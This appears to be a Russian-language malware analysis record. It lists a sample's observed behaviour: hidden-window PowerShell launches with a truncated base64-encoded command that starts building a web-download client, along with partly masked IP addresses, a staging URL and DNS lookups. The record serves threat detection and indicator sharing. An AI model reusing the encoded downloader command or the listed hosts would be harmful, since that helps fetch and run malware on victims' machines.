Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABtADMAXwA3ADkANAA9ACgAJwBzADAAMQAnACsAJwAxACcAKwAnADEAXwBfACcAKQA7ACQAaAA3ADMAMwAzAF8ANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiADAANwAwADUAXwBfAD0AKAAnAG...
- '66.##5.138.88':80
- '16#.#9.54.201':80
- 'pr####t.hoangnq.com':80
- http://pr####t.hoangnq.com/tour/images/catalog/namQ/
- DNS ASK pr####t.hoangnq.com
- DNS ASK se#######ntergratedsystems.com
- DNS ASK ec##7.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABtADMAXwA3ADkANAA9ACgAJwBzADAAMQAnACsAJwAxACcAKwAnADEAXwBfACcAKQA7ACQAaAA3ADMAMwAzAF8ANgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiADAANwAwADUAXwBfAD0AKAAnAG... (со скрытым окном)